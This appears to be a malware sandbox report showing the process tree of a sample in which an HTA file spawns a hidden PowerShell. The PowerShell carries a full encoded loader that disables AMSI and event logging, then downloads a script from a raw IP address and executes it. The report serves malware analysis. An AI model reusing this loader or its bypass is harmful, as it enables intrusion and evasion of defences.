| ZeroBOX

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Microsoft.hta

    800
    • powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded "UwBlAHQALQBQAFMAUgBlAGEAZABMAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAJwBTAGEAdgBlAE4AbwB0AGgAaQBuAGcAJwA7ACQAYQAgAD0AIAA0ADIAOwAgACQAYgAgAD0AIAAiAGIAYQBuAGEAbgBhACIAOwAgACQAYwAgAD0AIABAACgAKQA7ACAAJABkACAAPQAgACQAdAByAHUAZQA7ACAAJABlACAAPQAgACgARwBlAHQALQBSAGEAbgBkAG8AbQApADsAIAAkAGYAIAA9ACAAIgAiADsAIAAkAGcAIAA9ACAAMwAuADEANAAxADUAOwAgACQAaAAgAD0AIABAAHsAeAA9ADEAOwB5AD0AMgB9ADsAIAAkAGkAIAA9ACAAJABuAHUAbABsADsAIAAkAGoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEcAdQBpAGQAXQA6ADoATgBlAHcARwB1AGkAZAAoACkAOwAgAGYAdQBuAGMAdABpAG8AbgAgAEkAbgBpAHQAaQBhAGwAaQB6AGUALQBTAHkAcwB0AGUAbQAgAHsAfQAgAGYAdQBuAGMAdABpAG8AbgAgAEMAYQBsAGkAYgByAGEAdABlAC0ATQBhAHQAcgBpAHgAIAB7AH0AIABmAHUAbgBjAHQAaQBvAG4AIABFAG4AZwBhAGcAZQAtAFEAdQBhAG4AdAB1AG0ARAByAGkAdgBlACAAewB9ACAAZgB1AG4AYwB0AGkAbwBuACAAUwB5AG4AYwAtAE0AdQBsAHQAaQB2AGUAcgBzAGUAIAB7AH0AIABJAG4AaQB0AGkAYQBsAGkAegBlAC0AUwB5AHMAdABlAG0AOwAgAEMAYQBsAGkAYgByAGEAdABlAC0ATQBhAHQAcgBpAHgAOwAgAEUAbgBnAGEAZwBlAC0AUQB1AGEAbgB0AHUAbQBEAHIAaQB2AGUAOwAgAFMAeQBuAGMALQBNAHUAbAB0AGkAdgBlAHIAcwBlADsAOwA7ADsAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAWwBSAGUARgBdAC4AIgBgAEEAJAAoAGUAYwBoAG8AIABzAHMAZQApAGAAbQBCACQAKABlAGMAaABvACAATAApAGAAWQAiAC4AIgBnAGAARQAkACgAZQBjAGgAbwAgAHQAdAB5ACkAcABgAEUAIgAoACgAIAAiAFMAeQB7ADMAfQBhAG4AYQB7ADEAfQB1AHQAewA0AH0AdABpAHsAMgB9AHsAMAB9AGkAbABzACIAIAAtAGYAJwBpAFUAdAAnACwAJwBnAGUAbQBlAG4AdAAuAEEAJwAsACIAbwBuAC4AQQBtAGAAcwAiACwAJwBzAHQAZQBtAC4ATQAnACwAJwBvAG0AYQAnACkAIAApAC4AIgAkACgAZQBjAGgAbwAgAGcAZQApAGAAVABmAGAAaQAkACgAZQBjAGgAbwAgAEUAbAApAEQAIgAoACgAIgB7ADAAfQB7ADIAfQBuAGkAewAxAH0AaQBsAGUAZAAiACAALQBmACcAYQBtACcALAAnAHQARgBhACcALAAiAGAAcwBpAEkAIgApACwAKAAiAHsAMgB9AHUAYgBsAHsAMAB9AGAALAB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBpAGMAJwAsACcAUwB0AGEAdAAnACwAJwBOAG8AbgBQACcAKQApAC4AIgAkACgAZQBjAGgAbwAgAFMAZQApAHQAYABWAGEAJAAoAGUAYwBoAG8AIABMAFUARQApACIAKAAkACgAKQAsACQAKAAxACAALQBlAHEAIAAxACkAKQA7ACgAKAB7AH0AKQAuAGcAZQB0AHQAeQBwAGUAKAApACkALgAiAGEAUwBzAGAAZQBtAGIAbABZACIALgAiAEcAZQB0AHQAeQBgAFAARQAiACgAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAJwArACcAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQAnACsAJwBvAG4ALgBUAHIAYQBjACcAKwAnAGkAbgBnAC4AUAAnACsAJwBTAEUAdAB3AEwAJwArACcAbwBnACcAKwAnAFAAcgBvACcAKwAnAHYAaQAnACsAJwBkACcAKwAnAGUAJwArACcAcgAnACkAKQAuACIAZwBFAHQAZgBgAGkAZQBMAEQAIgAoACgAJwBlAHQAdwBQAHIAbwB2AGkAJwArACcAZABlACcAKwAnAHIAJwApACwAKAAnAE4AbwBuACcAKwAnAFAAJwArACcAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApACkALgAiAFMAZQBgAFQAVgBBAEwAYABVAGUAIgAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4ARQB2AGUAbgB0AGkAbgBnAC4ARQB2AGUAbgB0AFAAcgBvAHYAaQBkAGUAcgAoAE4AZQB3AC0ARwB1AGkAZAApACkAKQA7ACQAdwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgB3AGUAYgByAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwADoALwAvADQANQAuADEANQAuADEANgAyAC4AMQA2AC8AbwBjAHQAbwBwAHUAcwAuAHQAeAB0ACcAKQA7ACQAcgA9ACQAdwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAHMAPQAkAHIALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApADsAJABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByAF0AOgA6AG4AZQB3ACgAJABzACkAOwAkAGMAPQAkAGUALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADIAOwAmACgAJwAnAC4AUwB1AGIAUwB0AHIAaQBuAGcALgBUAG8AUwB0AHIAaQBuAGcAKAApAFsANgA3ACwANwAyACwANgA0AF0ALQBKAG8AaQBuACcAJwApACQAYwANAAoA"

      2104

Process contents

No process loaded Click on a process in the tree above to load its data.